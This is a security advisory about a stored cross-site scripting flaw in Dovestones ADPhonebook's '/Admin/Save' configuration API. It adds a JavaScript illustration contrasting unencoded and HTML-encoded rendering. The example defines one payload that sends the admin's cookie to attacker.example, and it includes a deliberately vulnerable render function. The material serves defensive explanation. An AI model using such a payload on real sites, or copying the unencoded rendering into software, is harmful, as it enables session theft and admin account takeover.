Dovestones Software ADPhonebook Stored Cross-Site Scripting Vulnerability

Vulnerability

A stored cross-site scripting vulnerability has been identified in Dovestones Software ADPhonebook versions prior to 4.0.1.1. The issue lies in the administrative configuration functionality: an authenticated admin user can submit JavaScript payloads in various application configuration fields through the '/Admin/Save' API, which stores the submitted values without adequate input validation. Because the stored values are later rendered without output encoding, the payload executes in the browser of anyone who views the affected configuration data, including other administrators, which can lead to session hijacking or impersonation of administrative accounts. Exploitation requires an authenticated administrative account.
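The following is an added illustration, not ADPhonebook's code, of the pattern the advisory describes: a save handler that persists an admin-supplied configuration value verbatim, a page renderer that concatenates the stored value into HTML (the vulnerable form), and the same renderer with HTML output encoding applied (the fixed form). The field names, the in-memory store, the request shape and the payload are all constructed assumptions; only the '/Admin/Save' endpoint name comes from the advisory.

```javascript
// Added example (not the product's code): stored XSS via an admin
// configuration field, and the output-encoding fix.
// Field names, the store and the request body shape are assumptions.

const ENTITY_MAP = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

// HTML-encode untrusted text before placing it in element content or in a
// quoted attribute value. Encoding at output time is the missing control;
// it protects the page regardless of what the save handler let through.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => ENTITY_MAP[ch]);
}

// Assumed in-memory configuration store standing in for persisted settings.
const configStore = {};

// Assumed handler behind '/Admin/Save': takes a field/value pair from an
// authenticated admin and stores the value unchanged, as the advisory describes.
function handleAdminSave(body) {
  const { field, value } = body;
  if (!/^[A-Za-z][A-Za-z0-9_]*$/.test(field)) throw new Error("bad field name");
  configStore[field] = value; // stored verbatim; this is what later reaches the sink
  return { ok: true };
}

// Vulnerable render: stored values are concatenated into markup unencoded.
function renderConfigUnsafe(store) {
  return Object.entries(store)
    .map(([k, v]) => `<tr><td>${k}</td><td>${v}</td></tr>`)
    .join("\n");
}

// Hardened render: every stored value is HTML-encoded on the way out.
function renderConfigSafe(store) {
  return Object.entries(store)
    .map(([k, v]) => `<tr><td>${escapeHtml(k)}</td><td>${escapeHtml(v)}</td></tr>`)
    .join("\n");
}

// Check you can run against a rendered page: does any stored value that
// carries markup characters appear in the output byte-for-byte (unencoded)?
function hasUnencodedValues(store, html) {
  return Object.values(store).some((v) => /[<>"']/.test(v) && html.includes(v));
}

// Constructed payload of the kind the advisory describes: script that runs
// when an admin views the configuration page and exfiltrates the cookie.
const PAYLOAD = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>';

// Walk through save, unsafe render and safe render; returns the results so
// they can be inspected or asserted on.
function demo() {
  handleAdminSave({ field: "companyName", value: "Example Corp" });
  handleAdminSave({ field: "footerText", value: PAYLOAD });
  const unsafe = renderConfigUnsafe(configStore);
  const safe = renderConfigSafe(configStore);
  return {
    unsafe,
    safe,
    unsafeLeaks: hasUnencodedValues(configStore, unsafe), // true
    safeLeaks: hasUnencodedValues(configStore, safe),     // false
  };
}

console.log(demo().safe);
```

Note that `escapeHtml` is only correct for HTML element content and quoted attribute values; a value placed inside a script block, a URL or an event-handler attribute needs a context-specific encoder instead. Marking the session cookie `HttpOnly` blunts the cookie-theft consequence but does not fix the XSS itself, since the injected script can still act on the admin's behalf within the application.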

Impact

Exploitation of this vulnerability allows arbitrary JavaScript to execute in the context of the application in the browser of any user who views the affected configuration data. Possible consequences include theft of session cookies or authentication tokens, session hijacking, compromise of administrative accounts, user impersonation, modification of application content, and delivery of phishing content through pages the user trusts.

Remediation

Users are advised to upgrade to Dovestones Software ADPhonebook version 4.0.1.1 or later. Since the payload is stored, administrators should also review existing configuration fields for injected markup after upgrading, as upgrading alone does not remove values that were saved before the fix.

Added: Jun 3, 2026, 6:57 PM
Updated: Jun 3, 2026, 6:57 PM

Vulnerability Rating

Custom Algorithm

spread: 0.0
impact: 5.4
exploitability: 4.5
remediation: 0.0
relevance: 9.9
threat: 0.0
urgency: 2.9
incentive: 0.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.